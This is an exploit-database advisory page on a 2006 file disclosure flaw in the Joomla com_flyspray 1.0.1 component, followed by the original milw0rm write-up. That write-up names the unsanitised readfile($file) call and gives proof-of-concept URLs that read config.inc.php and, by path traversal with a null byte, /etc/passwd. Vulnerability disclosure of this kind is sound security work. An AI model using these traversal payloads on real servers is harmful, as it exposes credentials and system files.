Joomla com_flyspray Component startdown.php File Disclosure Vulnerability

vendor:

Joomla

by:

Dr Max Virus

7,5

CVSS

HIGH

File Disclosure

CWE

Product Name: Joomla

Affected Version From: 1.0.1

Affected Version To: 1.0.1

Patch Exists: YES

Related CWE: N/A

CPE: a:joomla:joomla

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Joomla com_flyspray Component startdown.php File Disclosure Vulnerability

A vulnerability in the Joomla com_flyspray component allows an attacker to read any file on the server, including the configuration file. This is due to the lack of sanitization of the 'file' parameter in the startdown.php file. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server.

Mitigation:

Ensure that all user-supplied input is properly sanitized before being used.

Source

Exploit-DB raw data:

_____         __  __             __      ___
|  __ \       |  \/  |            \ \    / (_)
| |  | |_ __  | \  / | __ ___  __  \ \  / / _ _ __ _   _ ___
| |  | | '__| | |\/| |/ _` \ \/ /   \ \/ / | | '__| | | / __|
| |__| | |    | |  | | (_| |>  <     \  /  | | |  | |_| \__ \
|_____/|_|    |_|  |_|\__,_/_/\_\     \/   |_|_|   \__,_|___/


*****************************************************************************************************************************
Compononent name:com_flyspray
Affected Version:1.0.1
d.page:http://mamboxchange.com/frs/download.php/8304/com_flyspray_1.0.1.zip
*****************************************************************************************************************************
Authour: Dr Max Virus
Location:Egypt
*****************************************************************************************************************************
Bug in :startdown.php
Vul Code:
In Line 52:
readfile($file);
Problem:The variable of file not sanitized So u can read any file on server
and also config file
*****************************************************************************************************************************
POC:

http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=config.inc.php
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00
*****************************************************************************************************************************
Thx To:str0ke & Nukedx & Thehacker & All My Friends
Special Gr33Ts:ASIANEAGLE & The Master &Kacper
****************************************************************************************************************************

# milw0rm.com [2006-11-26]